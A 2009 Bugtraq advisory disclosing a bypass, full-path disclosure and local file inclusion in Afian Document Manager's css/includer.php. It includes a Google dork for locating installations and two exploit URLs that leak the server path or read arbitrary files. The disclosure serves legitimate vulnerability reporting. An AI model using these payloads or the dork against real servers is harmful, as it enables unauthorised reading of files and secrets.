[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Afian Document Manager Local File Inclusion
From: contact () vnbrain ! net
Date: 2009-02-28 3:46:57
Message-ID: 200902280346.n1S3kv3N025347 () www3 ! securityfocus ! com
[Download RAW message or body]
Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides an Web-based interface for documents residing on the Web server's file system.
This software has a secutity hole allow attackers download any files if they know the path.
Vendor: afian.com
Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion.
Version: Unknown (maybe 2.x.x)
Demo: http://demo.afian.com
Exploit:
Google Dork: Afian document manager
1. Bypass+Fullpath Disclosure:
http://site/path/css/includer.php?files=NOT_EXIST_FILE
It doesn't ask username/password and display fullpath.
2. Local File Inclusion: Read any files if know exactly path_of_file
http://site/path/css/includer.php?files=PATH_TO_FILE
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic